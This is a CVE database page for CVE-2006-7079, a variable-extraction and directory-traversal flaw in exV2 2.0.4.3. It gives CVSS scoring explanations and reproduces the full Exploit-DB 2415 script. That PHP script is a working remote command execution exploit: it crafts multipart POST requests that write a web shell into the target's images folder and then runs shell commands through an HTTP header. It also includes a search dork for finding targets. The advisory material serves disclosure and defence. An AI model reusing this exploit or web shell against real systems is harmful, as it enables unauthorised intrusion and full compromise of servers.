CVE-2006-7079 : Detail

CVE-2006-7079

9.8
/
Critical
Directory Traversal
A01-Broken Access Control
7.58%V3
Network
2007-02-27
17h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Variable extraction vulnerability in include/common.php in exV2 2.0.4.3 and earlier allows remote attackers to overwrite arbitrary program variables and conduct directory traversal attacks to execute arbitrary code by modifying the $xoopsOption['pagetype'] variable.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
CWE-913 Improper Control of Dynamically-Managed Code Resources
The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2415

Publication date : 2006-09-21 22h00 +00:00
Author : rgod
EDB Verified : Yes

#!/usr/bin/php -q -d short_open_tag=on <? print_r(' ------------------------------------------------------------------------------- exV2 <= 2.0.4.3 extract() remote commands execution exploit mail: retrog@alice.it site: http://retrogod.altervista.org dork: "Powered by eXV2 Vers" ------------------------------------------------------------------------------- '); /* this works regardless of php.ini settings two different exploit methods for register_globals=on or off */ if ($argc<4) { print_r(' ----------------------------------------------------------------------------- Usage: php '.$argv[0].' host path cmd OPTIONS host: target server (ip/hostname) path: path to exv2 cmd: a shell command Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' 2.2.2.2 /exv2/ ls -la -P1.1.1.1:80 php '.$argv[0].' 1.1.1.1 / ls -la -p81 ----------------------------------------------------------------------------- '); die; } /* software site: http://www.exv2.de/modules/welcome/ i) vulnerable code in include/common.php : ... // ################# :: Register Globals Compatibility :: ################# $globals_test = @ini_get('register_globals'); if ( isset($globals_test) && empty($globals_test) ) {echo "merdaaaaaaaaaaaaaaaaaaaa\n"; // These still need some work :: Cookie|Server|Env are ok now. if ( !empty($_GET) ) { extract($_GET, EXTR_SKIP); } if ( !empty($_POST) ) { extract($_POST, EXTR_OVERWRITE); } define('_GLOBALS', FALSE); } else { define('_GLOBALS', TRUE); } ... if register_globals = off you can overwrite every var on target server found this exploitation method: some lines after this code we have: ... // ################ Include page-specific lang file ################ // von Zeile 135 herunter gesetzt, da Userinfo usw. nicht in die language übernommen wurde if ( isset($xoopsOption['pagetype']) ) { if ( @file_exists(XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/'.$xoopsOption['pagetype'].'.php') ) { include_once(XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/'.$xoopsOption['pagetype'].'.php'); } else { include_once(XOOPS_ROOT_PATH.'/language/english/'.$xoopsOption['pagetype'].'.php'); } } ... so we modify the $xoopsOption['pagetype'] var to reach the mail_template.php script in /include folder where we have: ... $code=stripslashes(isset($code) ? $code : ""); if(isset($op_action) && $op_action == "save" && $lang != "" && $script != ""){ $code=str_replace("&lt;","<",$code); $fp=fopen($mod_path."/language/".$lang."/mail_template/".$script, "w"); fputs ($fp,$code); fclose($fp); header("Location:index.php?".$temp_op."=mail_template&script=".$script."&lang=".$lang.""); exit(); } ... now we can save our shell code in a php file... also, if register_globals = On you can call directly the mail_template.php script to do the same stuff through the extract() bug is also possibile to delete recursively all sites content including the /modules/system/admin/design/include/conf_theme.php script and to upload images without authorization in /images/library folder including the image manager script and setting some vars ii) an sql injection issue, poc: http://retrogod.altervista.org/exv2_2043_sql.html iii) registered user can delete an arbitrary file on target server through avatar upload features, because of a directory traversal in old_avatar argument, passed to an unlink() this is the poc for i) */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} //register_globals=off, extract() tricks... $data='-----------------------------7d626f251b00fa Content-Disposition: form-data; name="xoopsOption[pagetype]" ../../include/mail_template -----------------------------7d626f251b00fa Content-Disposition: form-data; name="op_action" save -----------------------------7d626f251b00fa Content-Disposition: form-data; name="mod_path" . -----------------------------7d626f251b00fa Content-Disposition: form-data; name="lang" english -----------------------------7d626f251b00fa Content-Disposition: form-data; name="script" ../../../images/library/placeholder.php -----------------------------7d626f251b00fa Content-Disposition: form-data; name="code" <?php set_time_limit(0); error_reporting(0); echo "my_delim"; passthru($_SERVER[HTTP_SUNTZU]);?> -----------------------------7d626f251b00fa-- '; $packet ="POST ".$p." HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d626f251b00fa\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); //register_globals=on $data='-----------------------------7d626f251b00fa Content-Disposition: form-data; name="op_action" save -----------------------------7d626f251b00fa Content-Disposition: form-data; name="mod_path" . -----------------------------7d626f251b00fa Content-Disposition: form-data; name="lang" english -----------------------------7d626f251b00fa Content-Disposition: form-data; name="script" ../images/library/placeholder.php -----------------------------7d626f251b00fa Content-Disposition: form-data; name="code" <?php set_time_limit(0); error_reporting(0); echo "my_delim"; passthru($_SERVER[HTTP_SUNTZU]);?> -----------------------------7d626f251b00fa-- '; $packet ="POST ".$p."include/mail_template.php HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d626f251b00fa\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); $packet ="GET ".$p."images/library/placeholder.php HTTP/1.0\r\n"; $packet.="SUNTZU: $cmd\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"my_delim")) { $temp=explode("my_delim",$html); die($temp[1]); } echo "exploit failed..."; ?> # milw0rm.com [2006-09-22]

Products Mentioned

Configuraton 0

Exv2>>Content_management_system >> Version To (including) 2.0.4.3

    References

    https://www.exploit-db.com/exploits/2415
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securityfocus.com/bid/20161
    Tags : vdb-entry, x_refsource_BID